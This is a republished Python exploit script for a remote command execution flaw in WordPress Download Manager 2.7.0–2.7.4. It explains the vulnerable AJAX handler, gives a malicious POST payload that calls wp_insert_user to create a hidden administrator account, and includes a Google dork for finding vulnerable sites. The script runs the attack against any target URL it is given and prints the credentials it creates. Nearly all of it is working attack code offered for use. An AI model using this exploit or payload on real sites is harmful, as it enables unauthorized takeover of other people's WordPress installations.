WordPress Download Manager RCE - naufalardhani.com

1. #!/usr/bin/python
2. #
3. # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
4. #
5. # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
6. #
7. # Exploit written by Claudio Viviani
8. #
9. #
10. # 2014-12-03: Discovered vulnerability
11. # 2014-12-04: Patch released (2.7.5)
12. #
13. # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
14. #
15. # --------------------------------------------------------------------
16. #
17. # The vulnerable function is located on "/download-manager/wpdm-core.php" file:
18. #
19. # function wpdm_ajax_call_exec()
20. # {
21. # if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
22. # if (function_exists($_POST['execute']))
23. # call_user_func($_POST['execute'], $_POST);
24. # else
25. # echo "function not defined!";
26. # die();
27. # }
28. # }
29. #
30. # Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
31. # wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
32. #
33. # if (function_exists($_POST['execute']))
34. # call_user_func($_POST['execute'], $_POST);
35. # else
36. # ...
37. # ...
38. # ...
39. #
40. # $_POST data needs to be an array
41. #
42. #
43. # The wordpress function wp_insert_user is perfect:
44. #
45. # http://codex.wordpress.org/Function_Reference/wp_insert_user
46. #
47. # Description
48. #
49. # Insert a user into the database.
50. #
51. # Usage
52. #
53. # <?php wp_insert_user( $userdata ); ?>
54. #
55. # Parameters
56. #
57. # $userdata
58. # (mixed) (required) An array of user data, stdClass or WP_User object.
59. # Default: None
60. #
61. #
62. #
63. # Evil POST Data (Add new Wordpress Administrator):
64. #
65. # action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
66. #
67. # ---------------------------------------------------------------------
68. #
69. # Dork google: index of "wordpress-download"
70. #
71. # Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
72. #
73. # Http connection
74. import urllib, urllib2, socket
75. #
76. import sys
77. # String manipulator
78. import string, random
79. # Args management
80. import optparse
81.  
82. # Check url
83. def checkurl(url):
84. if url[:8] != "https://" and url[:7] != "http://":
85. print('[X] You must insert http:// or https:// procotol')
86. sys.exit(1)
87. else:
88. return url
89.  
90. # Check if file exists and has readable
91. def checkfile(file):
92. if not os.path.isfile(file) and not os.access(file, os.R_OK):
93. print '[X] '+file+' file is missing or not readable'
94. sys.exit(1)
95. else:
96. return file
97.  
98. def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
99. return ''.join(random.choice(chars) for _ in range(size))
100.  
101. banner = """
102. ___ ___ __
103. | Y .-----.----.--| .-----.----.-----.-----.-----.
104. |. | | _ | _| _ | _ | _| -__|__ --|__ --|
105. |. / \ |_____|__| |_____| __|__| |_____|_____|_____|
106. |: | ______ |__| __ __
107. |::.|:. | | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
108. `--- ---' |. | \| _ | | | | | | _ | _ | _ |
109. |. | |_____|________|__|__|__|_____|___._|_____|
110. |: 1 / ___ ___
111. |::.. . / | Y .---.-.-----.---.-.-----.-----.----.
112. `------' |. | _ | | _ | _ | -__| _|
113. |. \_/ |___._|__|__|___._|___ |_____|__|
114. |: | | |_____|
115. |::.|:. |
116. `--- ---'
117. Wordpress Download Manager
118. R3m0t3 C0d3 Ex3cut10n
119. (Add WP Admin)
120. v2.7.0-2.7.4
121.  
122. Written by:
123.  
124. Claudio Viviani
125.  
126. http://www.homelab.it
127.  
128. info@homelab.it
129. homelabit@protonmail.ch
130.  
131. https://www.facebook.com/homelabit
132. https://twitter.com/homelabit
133. https://plus.google.com/+HomelabIt1/
134. https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
135. """
136.  
137. commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
138. commandList.add_option('-t', '--target', action="store",
139. help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
140. )
141. commandList.add_option('--timeout', action="store", default=10, type="int",
142. help="[Timeout Value] - Default 10",
143. )
144.  
145. options, remainder = commandList.parse_args()
146.  
147. # Check args
148. if not options.target:
149. print(banner)
150. commandList.print_help()
151. sys.exit(1)
152.  
153. host = checkurl(options.target)
154. timeout = options.timeout
155.  
156. print(banner)
157.  
158. socket.setdefaulttimeout(timeout)
159.  
160. username = id_generator()
161. pwd = id_generator()
162.  
163. body = urllib.urlencode({'action' : 'wpdm_ajax_call',
164. 'execute' : 'wp_insert_user',
165. 'user_login' : username,
166. 'user_pass' : pwd,
167. 'role' : 'administrator'})
168.  
169. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
170.  
171. print "[+] Tryng to connect to: "+host
172. try:
173. req = urllib2.Request(host+"/", body, headers)
174. response = urllib2.urlopen(req)
175. html = response.read()
176.  
177. if html == "":
178. print("[!] Account Added")
179. print("[!] Location: "+host+"/wp-login.php")
180. print("[!] Username: "+username)
181. print("[!] Password: "+pwd)
182. else:
183. print("[X] Exploitation Failed :(")
184.  
185. except urllib2.HTTPError as e:
186. print("[X] "+str(e))
187. except urllib2.URLError as e:
188. print("[X] Connection Error: "+str(e))